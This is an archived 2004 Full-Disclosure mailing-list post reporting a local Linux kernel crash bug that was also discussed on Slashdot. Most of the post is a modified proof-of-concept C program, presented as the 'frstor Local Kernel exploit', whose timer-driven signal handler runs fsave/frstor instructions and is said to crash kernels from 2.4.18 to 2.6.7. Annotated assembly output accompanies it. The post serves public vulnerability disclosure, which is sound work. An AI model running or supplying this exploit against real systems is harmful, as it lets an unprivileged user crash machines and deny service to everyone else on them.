| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: lorenzohgh at tuxedo-es.org (Lorenzo Hernandez Garcia-Hierro)
Subject: linux kernel local crash seen on slashdot
Hi,
> Looked through the archives here and didn't see this one yet..
>
> http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
There is also an article in Slashdot ( i've been out of the list and
possibly others sent the link , anyway i'm pasting it here ):
http://slashdot.org/articles/04/06/14/118209.shtml?tid=106&tid=126&tid=128&tid=185&tid=190
There is proof of concept code at some of the slashdot comments,this is
a modified version with more information ( and a little change of fsave
line.):
===
/* --------------------
* frstor Local Kernel exploit
* Crashes any kernel from 2.4.18
* to 2.6.7 because frstor in assembler inline offsets in memory by 4.
* Original proof of concept code
* by stian_@...xia.no.
* Added some stuff by lorenzo_@...u.org
* and fixed the fsave line with (*fpubuf).
* --------------------
*/
/*
---------
Some debugging information made
available by stian_@...xia.no
---------
TakeDown:
pushl %ebp
movl %esp, %ebp
subl $136, %esp
leal -120(%ebp), %eax
movl %eax, -124(%ebp)
#APP
fsave -124(%ebp)
#NO_APP
subl $4, %esp
pushl $1
pushl $.LC0
pushl $2
call write
addl $16, %esp
leal -120(%ebp), %eax
movl %eax, -128(%ebp)
#APP
frstor -128(%ebp)
#NO_APP
leave
ret
*/
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>
static void TakeDown(int ignore)
{
char fpubuf[108];
// __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
__asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, TakeDown);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
// <<EOF
===
Cheers,
PS: My 2.4.25-gentoo seems not affected by this but the bf24 flavour of
my old box is vulnerable.
--
Lorenzo Hernandez Garcia-Hierro <lorenzohgh@...edo-es.org>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada
digitalmente
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040614/58222fcd/attachment-0001.bin
Powered by blists - more mailing lists